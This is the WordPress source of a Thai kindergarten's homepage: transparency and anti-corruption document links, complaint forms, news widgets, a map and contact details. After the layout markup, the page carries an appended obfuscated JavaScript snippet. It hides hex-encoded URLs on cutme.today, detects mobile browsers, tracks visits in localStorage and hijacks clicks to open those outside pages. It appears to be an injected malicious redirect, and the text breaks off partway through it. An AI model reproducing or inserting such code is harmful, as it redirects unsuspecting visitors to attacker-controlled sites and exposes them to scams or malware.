-->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 